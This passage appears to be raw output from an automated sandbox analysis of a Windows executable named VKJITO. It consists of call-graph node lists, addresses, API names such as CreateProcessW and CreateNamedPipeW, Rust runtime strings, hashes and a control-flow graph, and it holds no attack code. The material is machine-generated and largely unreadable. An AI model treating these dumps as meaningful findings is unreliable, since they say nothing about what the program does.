27850->27851 27852 7ff7d43441d0 memmove 27851->27852 27853 7ff7d432deaa 27852->27853 27854 7ff7d433c330 121 API calls 27853->27854 27855 7ff7d432dec1 27854->27855 27856 7ff7d432dece 27855->27856 27857 7ff7d432e005 27855->27857 27858 7ff7d432d920 CloseHandle CloseHandle CloseHandle CloseHandle CloseHandle 27856->27858 27859 7ff7d435c660 6 API calls 27857->27859 27860 7ff7d432df10 27858->27860 27859->27840 27861 7ff7d432da60 9 API calls 27860->27861 27862 7ff7d432df19 27861->27862 27862->27834 27864 7ff7d4325249 27863->27864 28272 7ff7d4338570 27864->28272 27869 7ff7d432df50 27869->27786 27870 7ff7d432dd01 27870->27869 28275 7ff7d4337f90 27870->28275 27871 7ff7d432dd9e 27872 7ff7d432ddab 27871->27872 27873 7ff7d432df7f 27871->27873 28290 7ff7d433c230 27872->28290 28312 7ff7d435c660 6 API calls 27873->28312 27876 7ff7d432dde2 28296 7ff7d43385b0 27876->28296 27879 7ff7d432dfb7 28313 7ff7d435c660 6 API calls 27879->28313 27880 7ff7d432de0e 27883 7ff7d43440e0 memmove 27880->27883 27884 7ff7d432de27 memmove 27883->27884 27885 7ff7d432de53 27884->27885 27886 7ff7d432dfeb 27885->27886 27887 7ff7d432de61 27885->27887 28314 7ff7d435c330 6 API calls 27886->28314 27889 7ff7d43441d0 memmove 27887->27889 27890 7ff7d432de85 27889->27890 27891 7ff7d43441d0 memmove 27890->27891 27892 7ff7d432de9b 27891->27892 27893 7ff7d43441d0 memmove 27892->27893 27894 7ff7d432deaa 27893->27894 28306 7ff7d433c330 27894->28306 27897 7ff7d432dece 28310 7ff7d432d920 CloseHandle CloseHandle CloseHandle CloseHandle CloseHandle 27897->28310 27898 7ff7d432e005 28315 7ff7d435c660 6 API calls 27898->28315 27901 7ff7d432df10 28311 7ff7d432da60 9 API calls 27901->28311 27903 7ff7d432df19 27903->27869 27905 7ff7d4325660 2 API calls 27904->27905 27906 7ff7d4324f27 27905->27906 28327 7ff7d4326440 27906->28327 27908 7ff7d4324f5d 27908->27793 27912->27753 27913->27759 27914->27768 27915->27770 27951 7ff7d43440e0 27921->27951 27923 7ff7d432cf08 27955 7ff7d43441d0 27923->27955 27925 7ff7d432cf1d 27960 7ff7d433c3d0 27925->27960 27928 7ff7d432cf42 27994 7ff7d432cc40 9 API calls 27928->27994 27929 7ff7d432d24f 28004 7ff7d435c660 6 API calls 27929->28004 27933 7ff7d432cf85 27995 7ff7d4325660 27933->27995 27935 7ff7d432cf9f 27936 7ff7d432cfdc 27935->27936 28001 7ff7d434cff0 9 API calls 27935->28001 28002 7ff7d435d3d0 21 API calls 27936->28002 27939 7ff7d432d020 27942 7ff7d432d054 27939->27942 28003 7ff7d434d550 22 API calls 27939->28003 27941 7ff7d432d14a memcmp 27941->27942 27943 7ff7d432d15c 27941->27943 27942->27941 27942->27943 27943->27817 28270 7ff7d43379a0 9 API calls 27944->28270 27946 7ff7d433c89c 28271 7ff7d4341a70 ExitProcess 27946->28271 27949->27817 27950->27817 27952 7ff7d43440f7 27951->27952 27953 7ff7d43441c8 27952->27953 27954 7ff7d434412e memmove 27952->27954 27954->27923 27956 7ff7d43441f5 27955->27956 27957 7ff7d434422c memmove 27956->27957 27958 7ff7d43442a9 27956->27958 27959 7ff7d434424a 27957->27959 27958->27925 27959->27925 28005 7ff7d43442f0 27960->28005 27962 7ff7d433c410 27963 7ff7d432cf34 27962->27963 27964 7ff7d433c449 27962->27964 27965 7ff7d433c43f CloseHandle 27962->27965 27963->27928 27963->27929 27966 7ff7d433c469 27964->27966 27967 7ff7d433c4cd 27964->27967 27965->27964 27970 7ff7d433c479 27966->27970 27971 7ff7d433c515 27966->27971 27968 7ff7d433c4d2 27967->27968 27969 7ff7d433c54f WaitForSingleObject 27967->27969 28169 7ff7d43435a0 10 API calls 27968->28169 27974 7ff7d433c561 GetLastError 27969->27974 27975 7ff7d433c5a6 GetExitCodeProcess 27969->27975 28149 7ff7d4343870 27970->28149 28170 7ff7d43435a0 10 API calls 27971->28170 27980 7ff7d433c576 27974->27980 27975->27974 27982 7ff7d433c592 27975->27982 27978 7ff7d433c4f4 27984 7ff7d433c4ff CloseHandle 27978->27984 27985 7ff7d433c663 27978->27985 27979 7ff7d433c530 27986 7ff7d433c542 CloseHandle 27979->27986 27987 7ff7d433c695 27979->27987 27980->27982 27981 7ff7d433c49c 28168 7ff7d435c660 6 API calls 27981->28168 27983 7ff7d433c5f5 CloseHandle CloseHandle 27982->27983 27990 7ff7d433c60e 27983->27990 27984->27969 28171 7ff7d435c660 6 API calls 27985->28171 27986->27969 28172 7ff7d435c660 6 API calls 27987->28172 27990->27963 27994->27933 27997 7ff7d432569e 27995->27997 27996 7ff7d432573d memmove 27999 7ff7d432575f 27996->27999 27997->27996 27998 7ff7d43256d9 27997->27998 27998->27935 27999->27998 28000 7ff7d43257f6 memmove 27999->28000 28000->27999 28001->27936 28002->27939 28003->27939 28006 7ff7d4344346 28005->28006 28007 7ff7d434437c GetEnvironmentStringsW 28006->28007 28025 7ff7d434434b 28006->28025 28027 7ff7d4344509 28006->28027 28008 7ff7d4347649 GetLastError 28007->28008 28016 7ff7d4344392 28007->28016 28246 7ff7d435c260 6 API calls 28008->28246 28012 7ff7d4347776 CloseHandle 28012->27962 28013 7ff7d4344f5c 28013->27962 28014 7ff7d4344f52 CloseHandle 28014->28013 28015 7ff7d43444f5 FreeEnvironmentStringsW 28015->28027 28016->28015 28203 7ff7d43413c0 7 API calls 28016->28203 28204 7ff7d4333b10 23 API calls 28016->28204 28017 7ff7d43447a6 memmove 28017->28027 28021 7ff7d4344810 memmove 28021->28027 28022 7ff7d434488b memmove 28207 7ff7d4333b10 23 API calls 28022->28207 28023 7ff7d43367f0 26 API calls 28023->28027 28024 7ff7d434479c 28024->28012 28026 7ff7d4344ecb 28025->28026 28042 7ff7d4344f77 28025->28042 28109 7ff7d4344dd2 28025->28109 28029 7ff7d4345053 28026->28029 28035 7ff7d4344eda 28026->28035 28027->28017 28027->28021 28027->28022 28027->28023 28027->28024 28031 7ff7d4344b84 28027->28031 28032 7ff7d43475d7 28027->28032 28205 7ff7d4331860 6 API calls 28027->28205 28206 7ff7d4336ca0 8 API calls 28027->28206 28029->28024 28037 7ff7d4345079 memmove 28029->28037 28030 7ff7d4344ca5 CompareStringOrdinal 28030->28031 28031->28024 28031->28025 28031->28030 28033 7ff7d4344d13 28031->28033 28243 7ff7d435c330 6 API calls 28032->28243 28033->28025 28034 7ff7d43474ef GetLastError 28033->28034 28242 7ff7d435c260 6 API calls 28034->28242 28055 7ff7d4344f28 28035->28055 28208 7ff7d4340600 28035->28208 28222 7ff7d4341a80 memmove memmove memmove 28037->28222 28041 7ff7d43452a7 28173 7ff7d4341810 28041->28173 28042->28041 28042->28109 28230 7ff7d4341580 memmove 28042->28230 28043 7ff7d43450b7 28223 7ff7d4348aa0 28043->28223 28047 7ff7d43450ea 28047->28055 28229 7ff7d433bcf0 6 API calls 28047->28229 28048 7ff7d43452ba 28066 7ff7d43452c3 28048->28066 28189 7ff7d433bba0 28048->28189 28051 7ff7d4345314 28053 7ff7d433ace0 6 API calls 28051->28053 28052 7ff7d433ace0 6 API calls 28069 7ff7d434529b 28052->28069 28054 7ff7d4345353 28053->28054 28057 7ff7d4345373 28054->28057 28063 7ff7d433b850 7 API calls 28054->28063 28055->28109 28139 7ff7d4345d5f 28055->28139 28235 7ff7d4340120 6 API calls 28055->28235 28056 7ff7d4341580 memmove 28056->28069 28064 7ff7d4348aa0 28 API calls 28057->28064 28059 7ff7d4345478 SetLastError GetSystemDirectoryW 28061 7ff7d4345493 GetLastError 28059->28061 28059->28066 28061->28066 28067 7ff7d43456b5 GetLastError 28061->28067 28062 7ff7d4348aa0 28 API calls 28062->28069 28063->28057 28064->28066 28066->28055 28066->28059 28068 7ff7d43454ad GetLastError 28066->28068 28075 7ff7d43454e0 28066->28075 28093 7ff7d4345552 28067->28093 28068->28066 28072 7ff7d434760f 28068->28072 28069->28041 28069->28052 28069->28055 28069->28056 28069->28062 28231 7ff7d433b850 7 API calls 28069->28231 28244 7ff7d435c330 6 API calls 28072->28244 28076 7ff7d43454e9 28075->28076 28077 7ff7d4347701 28075->28077 28192 7ff7d4339e30 28076->28192 28247 7ff7d435c780 6 API calls 28077->28247 28078 7ff7d43467de AcquireSRWLockExclusive 28104 7ff7d434681f 28078->28104 28080 7ff7d43465fa 28238 7ff7d43325b0 6 API calls 28080->28238 28085 7ff7d43454f8 28196 7ff7d433ace0 28085->28196 28087 7ff7d43468cc 28094 7ff7d43473dc 28087->28094 28095 7ff7d43473cf CloseHandle 28087->28095 28088 7ff7d4345512 28090 7ff7d4345535 28088->28090 28096 7ff7d433b850 7 API calls 28088->28096 28089 7ff7d4345ebe 28089->28078 28089->28109 28097 7ff7d4348aa0 28 API calls 28090->28097 28091 7ff7d43457e8 SetLastError GetWindowsDirectoryW 28092 7ff7d4345802 GetLastError 28091->28092 28091->28093 28092->28093 28098 7ff7d434590c GetLastError 28092->28098 28093->28055 28093->28091 28099 7ff7d434581c GetLastError 28093->28099 28108 7ff7d434584f 28093->28108 28100 7ff7d43473e6 CloseHandle 28094->28100 28101 7ff7d43473f3 28094->28101 28095->28094 28096->28090 28097->28093 28143 7ff7d43458c4 28098->28143 28099->28093 28105 7ff7d434762c 28099->28105 28100->28101 28106 7ff7d43473fd CloseHandle 28101->28106 28131 7ff7d434740a 28101->28131 28102 7ff7d4346903 28107 7ff7d43473b8 CloseHandle 28102->28107 28103 7ff7d43462d4 memmove 28103->28139 28104->28087 28104->28102 28118 7ff7d43470ce 28104->28118 28123 7ff7d4346950 28104->28123 28239 7ff7d4349530 11 API calls 28104->28239 28245 7ff7d435c330 6 API calls 28105->28245 28106->28131 28107->28087 28113 7ff7d4345858 28108->28113 28114 7ff7d4347726 28108->28114 28144 7ff7d4344f46 28109->28144 28221 7ff7d43325b0 6 API calls 28109->28221 28119 7ff7d4339e30 memmove 28113->28119 28248 7ff7d435c780 6 API calls 28114->28248 28115 7ff7d434718b CreateProcessW 28120 7ff7d43471d8 28115->28120 28121 7ff7d4347356 GetLastError 28115->28121 28116 7ff7d434742c ReleaseSRWLockExclusive 28116->28109 28117 7ff7d43464d7 28237 7ff7d43325b0 6 API calls 28117->28237 28118->28115 28127 7ff7d434738a 28118->28127 28128 7ff7d4345867 28119->28128 28129 7ff7d434721e CloseHandle CloseHandle CloseHandle 28120->28129 28240 7ff7d4332de0 DeleteProcThreadAttributeList 28120->28240 28125 7ff7d434739e CloseHandle 28121->28125 28126 7ff7d434737b 28121->28126 28130 7ff7d43473ab CloseHandle 28123->28130 28124 7ff7d4345993 28233 7ff7d43381f0 12 API calls 28124->28233 28125->28130 28241 7ff7d4332de0 DeleteProcThreadAttributeList 28126->28241 28127->28125 28134 7ff7d433ace0 6 API calls 28128->28134 28200 7ff7d4332750 28129->28200 28130->28107 28131->28116 28137 7ff7d4345884 28134->28137 28138 7ff7d43458a7 28137->28138 28232 7ff7d433b850 7 API calls 28137->28232 28141 7ff7d4348aa0 28 API calls 28138->28141 28139->28080 28139->28089 28139->28103 28139->28109 28139->28117 28236 7ff7d4335320 6 API calls 28139->28236 28141->28143 28142 7ff7d4341580 memmove 28145 7ff7d43459c6 28142->28145 28143->28055 28143->28124 28144->28013 28144->28014 28145->28109 28145->28118 28145->28142 28146 7ff7d433ace0 6 API calls 28145->28146 28148 7ff7d4348aa0 28 API calls 28145->28148 28234 7ff7d433b850 7 API calls 28145->28234 28146->28145 28148->28145 28255 7ff7d4343bf0 CreateEventW 28149->28255 28151 7ff7d43438ad 28152 7ff7d43438ca 28151->28152 28153 7ff7d43438b7 CloseHandle 28151->28153 28155 7ff7d4343bf0 5 API calls 28152->28155 28154 7ff7d433c48c 28153->28154 28154->27969 28154->27981 28166 7ff7d43438f6 28155->28166 28156 7ff7d4343900 28158 7ff7d43329b0 6 API calls 28156->28158 28157 7ff7d4343960 WaitForMultipleObjects 28157->28166 28158->28154 28159 7ff7d4343a7c GetLastError 28167 7ff7d4343a32 28159->28167 28160 7ff7d43439d2 GetOverlappedResult 28163 7ff7d4343af7 GetLastError 28160->28163 28160->28166 28161 7ff7d4343993 GetOverlappedResult 28165 7ff7d4343a8e GetLastError 28161->28165 28161->28166 28163->28167 28164 7ff7d4343d10 8 API calls 28164->28166 28165->28167 28166->28156 28166->28157 28166->28159 28166->28160 28166->28161 28166->28164 28166->28167 28261 7ff7d43329b0 28167->28261 28169->27978 28170->27979 28174 7ff7d43418a0 28173->28174 28177 7ff7d4341874 28173->28177 28174->28177 28175 7ff7d43418f8 SetLastError GetModuleFileNameW 28176 7ff7d4341915 GetLastError 28175->28176 28175->28177 28176->28177 28178 7ff7d43419c8 GetLastError 28176->28178 28177->28174 28177->28175 28179 7ff7d434192f GetLastError 28177->28179 28181 7ff7d4341962 28177->28181 28182 7ff7d434197a 28178->28182 28179->28177 28180 7ff7d43419eb 28179->28180 28249 7ff7d435c330 6 API calls 28180->28249 28183 7ff7d434196b 28181->28183 28184 7ff7d4341a05 28181->28184 28182->28048 28186 7ff7d4339e30 memmove 28183->28186 28250 7ff7d435c780 6 API calls 28184->28250 28186->28182 28251 7ff7d4341cd0 6 API calls 28189->28251 28191 7ff7d433bbbf 28194 7ff7d4339e5b 28192->28194 28193 7ff7d4339f95 28193->28085 28194->28193 28195 7ff7d433e170 memmove 28194->28195 28195->28194 28197 7ff7d433ad1f 28196->28197 28252 7ff7d4341cd0 6 API calls 28197->28252 28199 7ff7d433ad47 28201 7ff7d4332765 28200->28201 28202 7ff7d4332774 ReleaseSRWLockExclusive 28200->28202 28201->28202 28202->28201 28203->28016 28204->28016 28205->28027 28206->28027 28207->28027 28209 7ff7d4340614 28208->28209 28212 7ff7d4340628 28208->28212 28209->28055 28210 7ff7d4340643 28211 7ff7d4342190 13 API calls 28210->28211 28213 7ff7d4340662 28211->28213 28212->28210 28214 7ff7d434069d 28212->28214 28215 7ff7d4340684 28212->28215 28213->28055 28214->28210 28218 7ff7d43406e0 28214->28218 28253 7ff7d434ac20 13 API calls 28215->28253 28217 7ff7d4340697 28217->28055 28254 7ff7d434b140 13 API calls 28218->28254 28220 7ff7d43406f8 28220->28055 28221->28144 28222->28043 28224 7ff7d4348abc 28223->28224 28225 7ff7d4340600 27 API calls 28224->28225 28228 7ff7d4348b0c 28224->28228 28226 7ff7d4348aee 28225->28226 28227 7ff7d4348af8 GetFileAttributesW 28226->28227 28226->28228 28227->28228 28228->28047 28230->28069 28231->28069 28232->28138 28233->28145 28234->28145 28235->28055 28236->28139 28237->28109 28238->28089 28239->28118 28240->28129 28241->28127 28251->28191 28252->28199 28253->28217 28254->28220 28256 7ff7d4343c7d GetLastError CloseHandle 28255->28256 28257 7ff7d4343c2b 28255->28257 28258 7ff7d4343caa 28256->28258 28257->28258 28259 7ff7d4343c49 28257->28259 28260 7ff7d4343cc1 CloseHandle CloseHandle 28258->28260 28259->28151 28260->28151 28264 7ff7d4343f70 28261->28264 28263 7ff7d43329cd CloseHandle CloseHandle 28265 7ff7d4343f92 CancelIo 28264->28265 28269 7ff7d4343fc8 28264->28269 28266 7ff7d4343fd0 GetLastError 28265->28266 28267 7ff7d4343fa6 GetOverlappedResult 28265->28267 28266->28269 28268 7ff7d434402c GetLastError 28267->28268 28267->28269 28268->28269 28269->28263 28270->27946 28273 7ff7d4341810 12 API calls 28272->28273 28274 7ff7d432dcf8 28273->28274 28274->27870 28309 7ff7d433bcf0 6 API calls 28274->28309 28277 7ff7d4337ff4 28275->28277 28276 7ff7d4338078 SetLastError GetCurrentDirectoryW 28276->28277 28278 7ff7d4338093 GetLastError 28276->28278 28277->28276 28280 7ff7d43380ad GetLastError 28277->28280 28282 7ff7d43380e0 28277->28282 28278->28277 28279 7ff7d4338148 GetLastError 28278->28279 28283 7ff7d43380f8 28279->28283 28280->28277 28281 7ff7d433816b 28280->28281 28316 7ff7d435c330 6 API calls 28281->28316 28284 7ff7d43380e9 28282->28284 28285 7ff7d4338185 28282->28285 28283->27871 28288 7ff7d4339e30 memmove 28284->28288 28317 7ff7d435c780 6 API calls 28285->28317 28288->28283 28292 7ff7d433c25c 28290->28292 28291 7ff7d433c293 memmove 28293 7ff7d433ace0 6 API calls 28291->28293 28292->28291 28295 7ff7d433c2e5 28292->28295 28294 7ff7d433c2c4 28293->28294 28294->27876 28295->27876 28297 7ff7d4340700 19 API calls 28296->28297 28301 7ff7d433860b 28297->28301 28298 7ff7d432de05 28298->27879 28298->27880 28301->28298 28302 7ff7d43386c0 CloseHandle 28301->28302 28303 7ff7d4338708 28301->28303 28318 7ff7d4340e60 28301->28318 28302->28298 28326 7ff7d435c700 6 API calls 28303->28326 28307 7ff7d43442f0 121 API calls 28306->28307 28308 7ff7d432dec1 28307->28308 28308->27897 28308->27898 28310->27901 28311->27903 28319 7ff7d4340ea4 NtWriteFile 28318->28319 28320 7ff7d4340e94 28318->28320 28321 7ff7d4340f0a 28319->28321 28322 7ff7d4340ef1 WaitForSingleObject 28319->28322 28320->28319 28323 7ff7d4340f0e 28321->28323 28324 7ff7d4340f1b RtlNtStatusToDosError 28321->28324 28322->28321 28325 7ff7d4340f41 28322->28325 28323->28301 28324->28323 28328 7ff7d4326482 28327->28328 28398 7ff7d4326713 28327->28398 28329 7ff7d43265cc 28328->28329 28330 7ff7d43264bf 28328->28330 28334 7ff7d4326d0a 28329->28334 28335 7ff7d43265e6 28329->28335 28331 7ff7d4326764 28330->28331 28332 7ff7d43264d3 28330->28332 28331->28334 28341 7ff7d432677e 28331->28341 28333 7ff7d43264f1 28332->28333 28366 7ff7d4326817 28332->28366 28336 7ff7d432699b 28333->28336 28337 7ff7d4326505 28333->28337 28419 7ff7d435c660 6 API calls 28334->28419 28402 7ff7d4330810 6 API calls 28335->28402 28336->28334 28353 7ff7d43269b5 28336->28353 28339 7ff7d4326523 28337->28339 28361 7ff7d4326aa3 28337->28361 28348 7ff7d4326537 28339->28348 28375 7ff7d4326ad2 28339->28375 28340 7ff7d43268c5 28344 7ff7d4326dc5 28340->28344 28345 7ff7d43268ec 28340->28345 28404 7ff7d4331440 7 API calls 28341->28404 28418 7ff7d435c660 6 API calls 28344->28418 28406 7ff7d4331650 memset memmove 28345->28406 28346 7ff7d43265fd 28355 7ff7d4326d24 28346->28355 28392 7ff7d4326608 28346->28392 28347 7ff7d4326c56 28356 7ff7d4326c5b memmove 28347->28356 28357 7ff7d4326bbf 28348->28357 28358 7ff7d4326555 28348->28358 28349 7ff7d4326ced 28415 7ff7d435c330 6 API calls 28349->28415 28350 7ff7d4326e30 28420 7ff7d435c660 6 API calls 28350->28420 28351 7ff7d4326795 28362 7ff7d4326d8c 28351->28362 28363 7ff7d43267a2 28351->28363 28408 7ff7d4330810 6 API calls 28353->28408 28416 7ff7d435c660 6 API calls 28355->28416 28413 7ff7d4325eb0 memmove 28356->28413 28373 7ff7d4326bd9 28357->28373 28400 7ff7d4326a91 28357->28400 28377 7ff7d432657a memmove 28358->28377 28358->28398 28361->28347 28361->28356 28361->28375 28361->28400 28417 7ff7d435c660 6 API calls 28362->28417 28405 7ff7d43310e0 15 API calls 28363->28405 28366->28340 28366->28349 28368 7ff7d4326afb 28410 7ff7d432f850 7 API calls 28368->28410 28370 7ff7d43269cc 28370->28350 28379 7ff7d43269d7 28370->28379 28372 7ff7d43266d4 28403 7ff7d43310e0 15 API calls 28372->28403 28411 7ff7d432f850 7 API calls 28373->28411 28375->28368 28375->28400 28401 7ff7d4330c00 9 API calls 28377->28401 28386 7ff7d4326e7d 28379->28386 28387 7ff7d4326a01 28379->28387 28380 7ff7d4326cd0 28414 7ff7d435c330 6 API calls 28380->28414 28382 7ff7d4326902 28407 7ff7d43310e0 15 API calls 28382->28407 28421 7ff7d435c660 6 API calls 28386->28421 28409 7ff7d4331650 memset memmove 28387->28409 28388 7ff7d4326c33 28412 7ff7d4330940 7 API calls 28388->28412 28392->28372 28392->28380 28394 7ff7d43265b0 28394->28398 28423 7ff7d435c660 6 API calls 28394->28423 28396 7ff7d4326b7a 28397 7ff7d4326b88 memmove 28396->28397 28397->28398 28398->27908 28399 7ff7d4326a1e 28399->28396 28399->28397 28399->28400 28422 7ff7d435c660 6 API calls 28400->28422 28401->28394 28402->28346 28403->28398 28404->28351 28405->28398 28406->28382 28407->28398 28408->28370 28409->28399 28410->28394 28411->28388 28412->28394 28413->28394 28424 7ff7d432efd0 7 API calls 28425 7ff7d4348c9f 28430 7ff7d4342940 28425->28430 28427 7ff7d4348cb1 28428 7ff7d4348cc5 28427->28428 28429 7ff7d4348dfb CloseHandle 28427->28429 28429->28428 28431 7ff7d43429a0 GetCurrentProcessId 28430->28431 28438 7ff7d43429b0 28431->28438 28432 7ff7d43429c7 BCryptGenRandom 28432->28438 28434 7ff7d4342e40 CreateNamedPipeW 28435 7ff7d4342fde 28434->28435 28436 7ff7d4342e8e GetLastError 28434->28436 28437 7ff7d4340700 19 API calls 28435->28437 28436->28438 28440 7ff7d4342f72 28436->28440 28437->28440 28438->28431 28438->28432 28438->28434 28438->28440 28442 7ff7d43430cf 28438->28442 28443 7ff7d4349a60 8 API calls 28438->28443 28439 7ff7d4342fc3 28439->28427 28440->28439 28441 7ff7d4342fba CloseHandle 28440->28441 28441->28439 28442->28427 28443->28438

                                      Executed Functions

                                      Function 00007FF7D43442F0 Relevance: 74.0, APIs: 35, Strings: 6, Instructions: 2274COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandle$EnvironmentExclusiveLockStrings$AcquireFreeReleasememmove
                                      • String ID: .exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: self.height > 0$exe\\.\NUL\cmd.exemaximum number of ProcThreadAttributes exceeded
                                      • API String ID: 91921124-3342424890
                                      • Opcode ID: e1e732009ec57b56432fb0a3b5a4d220c72b66c861c76189749aef20f7872ff1
                                      • Instruction ID: 314a3a295eaa3fe2852caf01ba118a4e3be02d6c4a67ce2811ce09486fd7f747
                                      • Opcode Fuzzy Hash: e1e732009ec57b56432fb0a3b5a4d220c72b66c861c76189749aef20f7872ff1
                                      • Instruction Fuzzy Hash: 34339462A04BC188EB70AF2ADC843FD6761FB45789FC4513ADA4D6BB99DF399240C710
                                      Function 00007FF7D4342940 Relevance: 8.0, APIs: 5, Instructions: 499COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1113 7ff7d4342940-7ff7d434299f 1114 7ff7d43429a0-7ff7d43429a9 GetCurrentProcessId 1113->1114 1115 7ff7d43429bb-7ff7d43429c5 1114->1115 1116 7ff7d43429c7-7ff7d43429e2 BCryptGenRandom 1115->1116 1117 7ff7d4342a10-7ff7d4342aa3 call 7ff7d43254b0 1115->1117 1118 7ff7d43429b0 1116->1118 1119 7ff7d43429e4-7ff7d43429ff call 7ff7d4349a60 1116->1119 1125 7ff7d4342ab6-7ff7d4342adf 1117->1125 1126 7ff7d4342aa5-7ff7d4342ab1 call 7ff7d43272b0 1117->1126 1121 7ff7d43429b4 1118->1121 1119->1121 1121->1115 1127 7ff7d4342ae1-7ff7d4342aec 1125->1127 1128 7ff7d4342b00-7ff7d4342b0d 1125->1128 1126->1125 1130 7ff7d4342aee-7ff7d4342af2 1127->1130 1131 7ff7d4342b20-7ff7d4342b32 1127->1131 1132 7ff7d4342bac-7ff7d4342bc6 1128->1132 1133 7ff7d4342b84-7ff7d4342b89 1130->1133 1134 7ff7d4342b78-7ff7d4342b81 1131->1134 1135 7ff7d4342b34-7ff7d4342b46 1131->1135 1136 7ff7d4343119-7ff7d434313d call 7ff7d4325460 1132->1136 1137 7ff7d4342bcc-7ff7d4342bea call 7ff7d43272a0 1132->1137 1141 7ff7d4342b8b-7ff7d4342ba7 1133->1141 1134->1133 1139 7ff7d4342f2d-7ff7d4342f3e 1135->1139 1140 7ff7d4342b4c-7ff7d4342b71 1135->1140 1144 7ff7d4343142-7ff7d434317b 1136->1144 1149 7ff7d4342bf0-7ff7d4342c0c 1137->1149 1150 7ff7d43430e6-7ff7d4343117 call 7ff7d435c170 1137->1150 1139->1133 1143 7ff7d4342f44-7ff7d4342f6d 1139->1143 1140->1133 1145 7ff7d4342b73 1140->1145 1141->1132 1143->1141 1147 7ff7d434317d-7ff7d434318d call 7ff7d43272b0 1144->1147 1148 7ff7d4343192-7ff7d43431cb 1144->1148 1145->1143 1147->1148 1151 7ff7d4342c1a-7ff7d4342c1d 1149->1151 1150->1144 1155 7ff7d4342c90-7ff7d4342c9c 1151->1155 1156 7ff7d4342c1f-7ff7d4342c22 1151->1156 1159 7ff7d4342ca2-7ff7d4342cba 1155->1159 1160 7ff7d4342e40-7ff7d4342e88 CreateNamedPipeW 1155->1160 1157 7ff7d4342c70-7ff7d4342c73 1156->1157 1158 7ff7d4342c24-7ff7d4342c26 1156->1158 1157->1155 1164 7ff7d4342c75-7ff7d4342c80 1157->1164 1161 7ff7d4342c29-7ff7d4342c2c 1158->1161 1165 7ff7d4342cbc-7ff7d4342cc2 1159->1165 1166 7ff7d4342d20-7ff7d4342d27 1159->1166 1162 7ff7d4342fde-7ff7d4342ff6 1160->1162 1163 7ff7d4342e8e-7ff7d4342ebc GetLastError 1160->1163 1167 7ff7d4342c2e-7ff7d4342c61 1161->1167 1168 7ff7d4342c10-7ff7d4342c17 1161->1168 1175 7ff7d4343009-7ff7d4343076 call 7ff7d4340700 1162->1175 1176 7ff7d4342ff8-7ff7d4343004 call 7ff7d43272b0 1162->1176 1169 7ff7d4342f72-7ff7d4342f8b 1163->1169 1170 7ff7d4342ec2-7ff7d4342ec5 1163->1170 1171 7ff7d4342d8a-7ff7d4342d9d 1164->1171 1172 7ff7d4342c86-7ff7d4342c8b 1164->1172 1173 7ff7d4342cc8-7ff7d4342cdd 1165->1173 1174 7ff7d43430d4-7ff7d43430d9 call 7ff7d4325460 1165->1174 1178 7ff7d4342d2f 1166->1178 1167->1165 1168->1151 1179 7ff7d4342f9e-7ff7d4342fa1 1169->1179 1180 7ff7d4342f8d-7ff7d4342f99 call 7ff7d43272b0 1169->1180 1181 7ff7d4342ec7-7ff7d4342ece 1170->1181 1182 7ff7d4342ed0-7ff7d4342ed3 1170->1182 1184 7ff7d4342de2-7ff7d4342def 1171->1184 1185 7ff7d4342d9f-7ff7d4342db2 1171->1185 1172->1161 1186 7ff7d4342cdf 1173->1186 1187 7ff7d4342ce4-7ff7d4342cf8 1173->1187 1174->1144 1189 7ff7d434307b-7ff7d434307e 1175->1189 1176->1175 1190 7ff7d4342d37-7ff7d4342d56 call 7ff7d43370d0 1178->1190 1192 7ff7d4342fb4-7ff7d4342fb8 1179->1192 1193 7ff7d4342fa3-7ff7d4342faf call 7ff7d43272b0 1179->1193 1180->1179 1194 7ff7d4342ee5-7ff7d4342f0b call 7ff7d4332840 1181->1194 1182->1169 1195 7ff7d4342ed9-7ff7d4342edf 1182->1195 1197 7ff7d4342df6-7ff7d4342e07 1184->1197 1185->1197 1198 7ff7d4342db4-7ff7d4342dd9 1185->1198 1186->1187 1187->1178 1199 7ff7d4342cfa-7ff7d4342d11 1187->1199 1200 7ff7d434309d-7ff7d43430b3 1189->1200 1201 7ff7d4343080-7ff7d4343092 1189->1201 1214 7ff7d4342d58-7ff7d4342d65 1190->1214 1215 7ff7d4342d7e 1190->1215 1206 7ff7d4342fba-7ff7d4342fbd CloseHandle 1192->1206 1207 7ff7d4342fc3-7ff7d4342fdd 1192->1207 1193->1192 1194->1114 1216 7ff7d4342f11-7ff7d4342f28 call 7ff7d43272b0 1194->1216 1195->1169 1195->1194 1202 7ff7d4342e09-7ff7d4342e2a 1197->1202 1203 7ff7d4342ddb 1197->1203 1198->1202 1198->1203 1199->1190 1200->1207 1210 7ff7d43430b9-7ff7d43430ca call 7ff7d43272b0 1200->1210 1201->1193 1209 7ff7d4343098 1201->1209 1202->1160 1203->1184 1206->1207 1209->1192 1210->1207 1218 7ff7d4342d6b-7ff7d4342d72 1214->1218 1219 7ff7d43430cf-7ff7d43430d2 1214->1219 1215->1171 1216->1114 1218->1215 1219->1174 1222 7ff7d43430db-7ff7d43430e4 call 7ff7d435c170 1219->1222 1222->1144
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
